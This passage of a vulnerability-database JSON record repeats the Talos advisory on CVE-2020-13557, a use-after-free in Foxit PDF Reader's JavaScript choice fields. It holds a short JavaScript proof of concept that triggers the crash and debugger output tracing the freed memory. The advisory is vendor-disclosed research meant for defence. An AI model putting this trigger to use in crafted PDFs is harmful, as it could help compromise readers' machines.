FoxitReader!safe_vsnprintf+0x0040d0c3\n 00e6dc7a FoxitReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x00024e8a\n 026a1d6a FoxitReader!safe_vsnprintf+0x00241c3a\n 018575f1 FoxitReader!CryptUIWizExport+0x00204911\n 018133b5 FoxitReader!CryptUIWizExport+0x001c06d5\n 030bf2bb FoxitReader!FXJSE_GetClass+0x0000022b\n 03284fb9 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5739\n 0328474f FoxitReader!CFXJSE_Arguments::GetValue+0x001c4ecf\n 03284a11 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5191\n 032848ab FoxitReader!CFXJSE_Arguments::GetValue+0x001c502b\n 0342be47 FoxitReader!CFXJSE_Arguments::GetValue+0x0036c5c7\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033b830f FoxitReader!CFXJSE_Arguments::GetValue+0x002f8a8f\n 033b812b FoxitReader!CFXJSE_Arguments::GetValue+0x002f88ab\n 030f5726 FoxitReader!CFXJSE_Arguments::GetValue+0x00035ea6\n 030f5207 FoxitReader!CFXJSE_Arguments::GetValue+0x00035987\n 030e2517 FoxitReader!CFXJSE_Arguments::GetValue+0x00022c97\n 030bda0f FoxitReader!FXJSE_Runtime_Release+0x00000c4f\n 030be224 FoxitReader!FXJSE_ExecuteScript+0x00000014\n 017b62e2 FoxitReader!CryptUIWizExport+0x00163602\n 017b70fd FoxitReader!CryptUIWizExport+0x0016441d\n 0141414d FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027fa6d\n 01412f0e FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027e82e\n \n\nIn the above, we set a breakpoint inside the event handler, but before the object in question is freed. Object to be freed is pointed to by `esi` and we can see its allocation size is 0x2c. Continuing execution just after this function call (after the call to `clearItems` is made in signal handler) shows the following state of the same chunk of memory:\n \n \n 0:000> p\n eax=00000001 ebx=00afde01 ecx=0d88782f edx=00ba0000 esi=1d786fd0 edi=00000002\n eip=02593893 esp=00afdd30 ebp=00afdd48 iopl=0 nv up ei pl nz ac pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216\n FoxitReader!safe_vsnprintf+0x133763:\n 02593893 83c404 add esp,4\n 0:000> dd 1d786fd0 \n 1d786fd0 ???????? ???????? ???????? ????????\n 1d786fe0 ???????? ???????? ???????? ????????\n 1d786ff0 ???????? ???????? ???????? ????????\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a 1d786fd0 \n address 1d786fd0 found in\n _DPH_HEAP_ROOT @ ba1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 11d23958: 1d786000 2000\n 68d4ae02 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77142c91 ntdll!RtlDebugFreeHeap+0x0000003e\n 770a3c45 ntdll!RtlpFreeHeap+0x000000d5\n 770a3812 ntdll!RtlFreeHeap+0x00000222\n 042239a6 FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002ebe36\n 0420180f FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002c9c9f\n 0286d0ab FoxitReader!safe_vsnprintf+0x0040cf7b\n 0286d73e FoxitReader!safe_vsnprintf+0x0040d60e\n 0286d3a2 FoxitReader!safe_vsnprintf+0x0040d272\n 02593893 FoxitReader!safe_vsnprintf+0x00133763\n 026a0303 FoxitReader!safe_vsnprintf+0x002401d3\n 01854935 FoxitReader!CryptUIWizExport+0x00201c55\n 01811b55 FoxitReader!CryptUIWizExport+0x001bee75\n 030bf2bb FoxitReader!FXJSE_GetClass+0x0000022b\n 03284fb9 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5739\n 0328474f FoxitReader!CFXJSE_Arguments::GetValue+0x001c4ecf\n 03284a11 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5191\n 032848ab FoxitReader!CFXJSE_Arguments::GetValue+0x001c502b\n 0342be47 FoxitReader!CFXJSE_Arguments::GetValue+0x0036c5c7\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033b830f FoxitReader!CFXJSE_Arguments::GetValue+0x002f8a8f\n 033b812b FoxitReader!CFXJSE_Arguments::GetValue+0x002f88ab\n 030f5726 FoxitReader!CFXJSE_Arguments::GetValue+0x00035ea6\n 030f5207 FoxitReader!CFXJSE_Arguments::GetValue+0x00035987\n 030e2517 FoxitReader!CFXJSE_Arguments::GetValue+0x00022c97\n 030bda0f FoxitReader!FXJSE_Runtime_Release+0x00000c4f\n 030be224 FoxitReader!FXJSE_ExecuteScript+0x00000014\n 017b62e2 FoxitReader!CryptUIWizExport+0x00163602\n 017b70fd FoxitReader!CryptUIWizExport+0x0016441d\n 01414405 FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027fd25\n 01411a5b FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027d37b\n \n\nClearly, the same memory is now freed. Function `clearItems` is now done and the rest of event handler can be executed. Continuing the execution leads to the following crash:\n \n \n 0:000> bd 0\n 0:000> g\n (14b8.23fc): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000000 ebx=00000000 ecx=1d786fd0 edx=00afe434 esi=00000000 edi=1d786fd0\n eip=0259636a esp=00afe450 ebp=00afe458 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\n FoxitReader!safe_vsnprintf+0x13623a:\n 0259636a 3b771c cmp esi,dword ptr [edi+1Ch] ds:002b:1d786fec=????????\n 0:000> dd edi\n 1d786fd0 ???????? ???????? ???????? ????????\n 1d786fe0 ???????? ???????? ???????? ????????\n 1d786ff0 ???????? ???????? ???????? ????????\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n \n\nThis shows a crash while dereferencing the same chunk of memory (now pointed to by `edi`) that was previously freed. This constitutes a use-after-free condition.\n\nFrom observing Javascript execution, we can conclude that the use-after-free happens after memory is freed, but before the event handler invocation code is finished. This means that an attacker can place additional Javascript code after freeing the memory, giving them a chance to take control of it to be reused. In the crashing function, pointer in `edi` is actually `this` pointer which, with careful memory manipulation, can lead to further memory corruption and ultimately arbitrary code execution.\n\n### Timeline\n\n2020-10-19 - Vendor Disclosure \n \n2020-12-09 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1175\n\nPrevious Report\n\nTALOS-2020-1181\n", "published": "2020-12-09T00:00:00", "modified": "2020-12-09T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1171", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2020-13557"], "type": "talos", "lastseen": "2021-07-28T14:34:09", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13557"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1171\n\n## Foxit Reader JavaScript choice field use-after-free vulnerability\n\n##### December 9, 2020\n\n##### CVE Number\n\nCVE-2020-13557\n\n### Summary\n\nA use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.\n\n### Tested Versions\n\nFoxit Reader Version: 10.1.0.37527\n\n### Product URLs\n\n<https://www.foxitsoftware.com/pdf-reader/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416 - Use After Free\n\n### Details\n\nFoxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe\u2019s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses V8 JavaScript engine.\n\nJavascript support in PDF renderers and editors enables interactive forms which can include different GUI elements such as buttons or text fields. A use after free vulnerability in Foxit Reader can be triggered while executing events that manipulate items of a choice field. Following code demonstrates triggering this vulnerability:\n \n \n function f0() { \n var fl = app.activeDocs[0].getField('choiceField');\n fl.insertItemAt(0,\"b\"); \n fl.setAction(\"Keystroke\",'f1();'); \n fl.deleteItemAt(0);\n \n }\n \n \n function f1() { \n app.activeDocs[0].getField('choiceField').clearItems(); \n }\n \n \n f0();\n \n\nIn the above code, function `f0` first sets up a `choiceField` form element with a single item inserted and attaches a `Keystroke` event to it. Events of type `Keystroke` are triggered either when contents of the field changes (via keystroke or otherwise). Deletion of the element at `0` then triggers the event handler which calls `clearItems`. Calling `clearItems` frees the memory associated with choice field objects while the event handler is still being processed. This can be observed in the debugger:\n \n \n 0:000> bp FoxitReader!safe_vsnprintf+0x13375e\n 0:000> bd 0\n 0:000> g\n ....\n 0:017> be 0\n 0:017> g\n Breakpoint 0 hit\n eax=00000001 ebx=1d09dff8 ecx=0d8879fb edx=00ba0000 esi=1ffd4fd0 edi=00000001\n eip=0259388e esp=00afdd00 ebp=00afdd2c iopl=0 nv up ei pl nz ac po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212\n FoxitReader!safe_vsnprintf+0x13375e:\n 0259388e e8dd9a2d00 call FoxitReader!safe_vsnprintf+0x40d240 (0286d370)\n 0:000> g\n Breakpoint 0 hit\n eax=00000001 ebx=00afde01 ecx=0d88782b edx=00ba0000 esi=1d786fd0 edi=00000002\n eip=0259388e esp=00afdd30 ebp=00afdd48 iopl=0 nv up ei pl nz ac po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212\n FoxitReader!safe_vsnprintf+0x13375e:\n 0259388e e8dd9a2d00 call FoxitReader!safe_vsnprintf+0x40d240 (0286d370)\n 0:000> dd esi\n 1d786fd0 c0c00005 1fcc8fd0 00000000 00000000\n 1d786fe0 c0c0c001 00000000 1d09dff8 00000001\n 1d786ff0 00000001 00000000 00000004 d0d0d0d0\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a esi\n address 1d786fd0 found in\n _DPH_HEAP_ROOT @ ba1000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 11d23958: 1d786fd0 2c - 1d786000 2000\n 68d4abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240\n 7714245b ntdll!RtlDebugAllocateHeap+0x00000039\n 770a6dd9 ntdll!RtlpAllocateHeap+0x000000f9\n 770a5ec9 ntdll!RtlpAllocateHeapInternal+0x00000179\n 770a5d3e ntdll!RtlAllocateHeap+0x0000003e\n 042239fc FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002ebe8c\n 0286d04b FoxitReader!safe_vsnprintf+0x0040cf1b\n 0286d5d6 FoxitReader!safe_vsnprintf+0x0040d4a6\n 0286d1f3 FoxitReader!safe_vsnprintf+0x0040d0c3\n 00e6dc7a FoxitReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x00024e8a\n 026a1d6a FoxitReader!safe_vsnprintf+0x00241c3a\n 018575f1 FoxitReader!CryptUIWizExport+0x00204911\n 018133b5 FoxitReader!CryptUIWizExport+0x001c06d5\n 030bf2bb FoxitReader!FXJSE_GetClass+0x0000022b\n 03284fb9 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5739\n 0328474f FoxitReader!CFXJSE_Arguments::GetValue+0x001c4ecf\n 03284a11 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5191\n 032848ab FoxitReader!CFXJSE_Arguments::GetValue+0x001c502b\n 0342be47 FoxitReader!CFXJSE_Arguments::GetValue+0x0036c5c7\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033b830f FoxitReader!CFXJSE_Arguments::GetValue+0x002f8a8f\n 033b812b FoxitReader!CFXJSE_Arguments::GetValue+0x002f88ab\n 030f5726 FoxitReader!CFXJSE_Arguments::GetValue+0x00035ea6\n 030f5207 FoxitReader!CFXJSE_Arguments::GetValue+0x00035987\n 030e2517 FoxitReader!CFXJSE_Arguments::GetValue+0x00022c97\n 030bda0f FoxitReader!FXJSE_Runtime_Release+0x00000c4f\n 030be224 FoxitReader!FXJSE_ExecuteScript+0x00000014\n 017b62e2 FoxitReader!CryptUIWizExport+0x00163602\n 017b70fd FoxitReader!CryptUIWizExport+0x0016441d\n 0141414d FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027fa6d\n 01412f0e FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027e82e\n \n\nIn the above, we set a breakpoint inside the event handler, but before the object in question is freed. Object to be freed is pointed to by `esi` and we can see its allocation size is 0x2c. Continuing execution just after this function call (after the call to `clearItems` is made in signal handler) shows the following state of the same chunk of memory:\n \n \n 0:000> p\n eax=00000001 ebx=00afde01 ecx=0d88782f edx=00ba0000 esi=1d786fd0 edi=00000002\n eip=02593893 esp=00afdd30 ebp=00afdd48 iopl=0 nv up ei pl nz ac pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216\n FoxitReader!safe_vsnprintf+0x133763:\n 02593893 83c404 add esp,4\n 0:000> dd 1d786fd0 \n 1d786fd0 ???????? ???????? ???????? ????????\n 1d786fe0 ???????? ???????? ???????? ????????\n 1d786ff0 ???????? ???????? ???????? ????????\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a 1d786fd0 \n address 1d786fd0 found in\n _DPH_HEAP_ROOT @ ba1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 11d23958: 1d786000 2000\n 68d4ae02 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77142c91 ntdll!RtlDebugFreeHeap+0x0000003e\n 770a3c45 ntdll!RtlpFreeHeap+0x000000d5\n 770a3812 ntdll!RtlFreeHeap+0x00000222\n 042239a6 FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002ebe36\n 0420180f FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002c9c9f\n 0286d0ab FoxitReader!safe_vsnprintf+0x0040cf7b\n 0286d73e FoxitReader!safe_vsnprintf+0x0040d60e\n 0286d3a2 FoxitReader!safe_vsnprintf+0x0040d272\n 02593893 FoxitReader!safe_vsnprintf+0x00133763\n 026a0303 FoxitReader!safe_vsnprintf+0x002401d3\n 01854935 FoxitReader!CryptUIWizExport+0x00201c55\n 01811b55 FoxitReader!CryptUIWizExport+0x001bee75\n 030bf2bb FoxitReader!FXJSE_GetClass+0x0000022b\n 03284fb9 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5739\n 0328474f FoxitReader!CFXJSE_Arguments::GetValue+0x001c4ecf\n 03284a11 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5191\n 032848ab FoxitReader!CFXJSE_Arguments::GetValue+0x001c502b\n 0342be47 FoxitReader!CFXJSE_Arguments::GetValue+0x0036c5c7\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033b830f FoxitReader!CFXJSE_Arguments::GetValue+0x002f8a8f\n 033b812b FoxitReader!CFXJSE_Arguments::GetValue+0x002f88ab\n 030f5726 FoxitReader!CFXJSE_Arguments::GetValue+0x00035ea6\n 030f5207 FoxitReader!CFXJSE_Arguments::GetValue+0x00035987\n 030e2517 FoxitReader!CFXJSE_Arguments::GetValue+0x00022c97\n 030bda0f FoxitReader!FXJSE_Runtime_Release+0x00000c4f\n 030be224 FoxitReader!FXJSE_ExecuteScript+0x00000014\n 017b62e2 FoxitReader!CryptUIWizExport+0x00163602\n 017b70fd FoxitReader!CryptUIWizExport+0x0016441d\n 01414405 FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027fd25\n 01411a5b FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027d37b\n \n\nClearly, the same memory is now freed. Function `clearItems` is now done and the rest of event handler can be executed. Continuing the execution leads to the following crash:\n \n \n 0:000> bd 0\n 0:000> g\n (14b8.23fc): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000000 ebx=00000000 ecx=1d786fd0 edx=00afe434 esi=00000000 edi=1d786fd0\n eip=0259636a esp=00afe450 ebp=00afe458 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\n FoxitReader!safe_vsnprintf+0x13623a:\n 0259636a 3b771c cmp esi,dword ptr [edi+1Ch] ds:002b:1d786fec=????????\n 0:000> dd edi\n 1d786fd0 ???????? ???????? ???????? ????????\n 1d786fe0 ???????? ???????? ???????? ????????\n 1d786ff0 ???????? ???????? ???????? ????????\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n \n\nThis shows a crash while dereferencing the same chunk of memory (now pointed to by `edi`) that was previously freed. This constitutes a use-after-free condition.\n\nFrom observing Javascript execution, we can conclude that the use-after-free happens after memory is freed, but before the event handler invocation code is finished. This means that an attacker can place additional Javascript code after freeing the memory, giving them a chance to take control of it to be reused. In the crashing function, pointer in `edi` is actually `this` pointer which, with careful memory manipulation, can lead to further memory corruption and ultimately arbitrary code execution.\n\n### Timeline\n\n2020-10-19 - Vendor Disclosure \n \n2020-12-09 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1175\n\nPrevious Report\n\nTALOS-2020-1181\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-12-09T20:44:13", "references": [{"idList": ["CVE-2020-13557"], "type": "cve"}, {"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-12-09T20:44:13", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "beea5dff8c1a33d62e33542f69f66b6c5817143bc4052f0290a0284b78630469", "hashmap": [{"hash": "bf07efb879cf64d26dde9da417189e3d", "key": "href"}, {"hash": "416030bade20550bce5f04312004dd67", "key": "published"}, {"hash": "416030bade20550bce5f04312004dd67", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "1936743779d6188c65fb3c27a5a8f2b2", "key": "description"}, {"hash": "342eab13384cd8721d57988a8abc4cd7", "key": "title"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "06740f628230eee658e65e5ebdcfa5d9", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1171", "id": "TALOS-2020-1171", "lastseen": "2020-12-09T20:44:13", "modified": "2020-12-09T00:00:00", "objectVersion": "1.3", "published": "2020-12-09T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "Foxit Reader JavaScript choice field use-after-free vulnerability", "type": "talos", "viewCount": 61}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2020-12-09T20:44:13"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13557"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1171\n\n## Foxit Reader JavaScript choice field use-after-free vulnerability\n\n##### December 9, 2020\n\n##### CVE Number\n\nCVE-2020-13557\n\n### Summary\n\nA use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.\n\n### Tested Versions\n\nFoxit Reader Version: 10.1.0.37527\n\n### Product URLs\n\n<https://www.foxitsoftware.com/pdf-reader/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416 - Use After Free\n\n### Details\n\nFoxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe\u2019s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses V8 JavaScript engine.\n\nJavascript support in PDF renderers and editors enables interactive forms which can include different GUI elements such as buttons or text fields. A use after free vulnerability in Foxit Reader can be triggered while executing events that manipulate items of a choice field. Following code demonstrates triggering this vulnerability:\n \n \n function f0() { \n var fl = app.activeDocs[0].getField('choiceField');\n fl.insertItemAt(0,\"b\"); \n fl.setAction(\"Keystroke\",'f1();'); \n fl.deleteItemAt(0);\n \n }\n \n \n function f1() { \n app.activeDocs[0].getField('choiceField').clearItems(); \n }\n \n \n f0();\n \n\nIn the above code, function `f0` first sets up a `choiceField` form element with a single item inserted and attaches a `Keystroke` event to it. Events of type `Keystroke` are triggered either when contents of the field changes (via keystroke or otherwise). Deletion of the element at `0` then triggers the event handler which calls `clearItems`. Calling `clearItems` frees the memory associated with choice field objects while the event handler is still being processed. This can be observed in the debugger:\n \n \n 0:000> bp FoxitReader!safe_vsnprintf+0x13375e\n 0:000> bd 0\n 0:000> g\n ....\n 0:017> be 0\n 0:017> g\n Breakpoint 0 hit\n eax=00000001 ebx=1d09dff8 ecx=0d8879fb edx=00ba0000 esi=1ffd4fd0 edi=00000001\n eip=0259388e esp=00afdd00 ebp=00afdd2c iopl=0 nv up ei pl nz ac po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212\n FoxitReader!safe_vsnprintf+0x13375e:\n 0259388e e8dd9a2d00 call FoxitReader!safe_vsnprintf+0x40d240 (0286d370)\n 0:000> g\n Breakpoint 0 hit\n eax=00000001 ebx=00afde01 ecx=0d88782b edx=00ba0000 esi=1d786fd0 edi=00000002\n eip=0259388e esp=00afdd30 ebp=00afdd48 iopl=0 nv up ei pl nz ac po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212\n FoxitReader!safe_vsnprintf+0x13375e:\n 0259388e e8dd9a2d00 call FoxitReader!safe_vsnprintf+0x40d240 (0286d370)\n 0:000> dd esi\n 1d786fd0 c0c00005 1fcc8fd0 00000000 00000000\n 1d786fe0 c0c0c001 00000000 1d09dff8 00000001\n 1d786ff0 00000001 00000000 00000004 d0d0d0d0\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a esi\n address 1d786fd0 found in\n _DPH_HEAP_ROOT @ ba1000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 11d23958: 1d786fd0 2c - 1d786000 2000\n 68d4abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240\n 7714245b ntdll!RtlDebugAllocateHeap+0x00000039\n 770a6dd9 ntdll!RtlpAllocateHeap+0x000000f9\n 770a5ec9 ntdll!RtlpAllocateHeapInternal+0x00000179\n 770a5d3e ntdll!RtlAllocateHeap+0x0000003e\n 042239fc FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002ebe8c\n 0286d04b FoxitReader!safe_vsnprintf+0x0040cf1b\n 0286d5d6 FoxitReader!safe_vsnprintf+0x0040d4a6\n 0286d1f3 FoxitReader!safe_vsnprintf+0x0040d0c3\n 00e6dc7a FoxitReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x00024e8a\n 026a1d6a FoxitReader!safe_vsnprintf+0x00241c3a\n 018575f1 FoxitReader!CryptUIWizExport+0x00204911\n 018133b5 FoxitReader!CryptUIWizExport+0x001c06d5\n 030bf2bb FoxitReader!FXJSE_GetClass+0x0000022b\n 03284fb9 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5739\n 0328474f FoxitReader!CFXJSE_Arguments::GetValue+0x001c4ecf\n 03284a11 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5191\n 032848ab FoxitReader!CFXJSE_Arguments::GetValue+0x001c502b\n 0342be47 FoxitReader!CFXJSE_Arguments::GetValue+0x0036c5c7\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033b830f FoxitReader!CFXJSE_Arguments::GetValue+0x002f8a8f\n 033b812b FoxitReader!CFXJSE_Arguments::GetValue+0x002f88ab\n 030f5726 FoxitReader!CFXJSE_Arguments::GetValue+0x00035ea6\n 030f5207 FoxitReader!CFXJSE_Arguments::GetValue+0x00035987\n 030e2517 FoxitReader!CFXJSE_Arguments::GetValue+0x00022c97\n 030bda0f FoxitReader!FXJSE_Runtime_Release+0x00000c4f\n 030be224 FoxitReader!FXJSE_ExecuteScript+0x00000014\n 017b62e2 FoxitReader!CryptUIWizExport+0x00163602\n 017b70fd FoxitReader!CryptUIWizExport+0x0016441d\n 0141414d FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027fa6d\n 01412f0e FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027e82e\n \n\nIn the above, we set a breakpoint inside the event handler, but before the object in question is freed. Object to be freed is pointed to by `esi` and we can see its allocation size is 0x2c. Continuing execution just after this function call (after the call to `clearItems` is made in signal handler) shows the following state of the same chunk of memory:\n \n \n 0:000> p\n eax=00000001 ebx=00afde01 ecx=0d88782f edx=00ba0000 esi=1d786fd0 edi=00000002\n eip=02593893 esp=00afdd30 ebp=00afdd48 iopl=0 nv up ei pl nz ac pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216\n FoxitReader!safe_vsnprintf+0x133763:\n 02593893 83c404 add esp,4\n 0:000> dd 1d786fd0 \n 1d786fd0 ???????? ???????? ???????? ????????\n 1d786fe0 ???????? ???????? ???????? ????????\n 1d786ff0 ???????? ???????? ???????? ????????\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a 1d786fd0 \n address 1d786fd0 found in\n _DPH_HEAP_ROOT @ ba1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 11d23958: 1d786000 2000\n 68d4ae02 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77142c91 ntdll!RtlDebugFreeHeap+0x0000003e\n 770a3c45 ntdll!RtlpFreeHeap+0x000000d5\n 770a3812 ntdll!RtlFreeHeap+0x00000222\n 042239a6 FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002ebe36\n 0420180f FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002c9c9f\n 0286d0ab FoxitReader!safe_vsnprintf+0x0040cf7b\n 0286d73e FoxitReader!safe_vsnprintf+0x0040d60e\n 0286d3a2 FoxitReader!safe_vsnprintf+0x0040d272\n 02593893 FoxitReader!safe_vsnprintf+0x00133763\n 026a0303 FoxitReader!safe_vsnprintf+0x002401d3\n 01854935 FoxitReader!CryptUIWizExport+0x00201c55\n 01811b55 FoxitReader!CryptUIWizExport+0x001bee75\n 030bf2bb FoxitReader!FXJSE_GetClass+0x0000022b\n 03284fb9 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5739\n 0328474f FoxitReader!CFXJSE_Arguments::GetValue+0x001c4ecf\n 03284a11 FoxitReader!CFXJSE_Arguments::GetValue+0x001c5191\n 032848ab FoxitReader!CFXJSE_Arguments::GetValue+0x001c502b\n 0342be47 FoxitReader!CFXJSE_Arguments::GetValue+0x0036c5c7\n 033ba780 FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033ba780 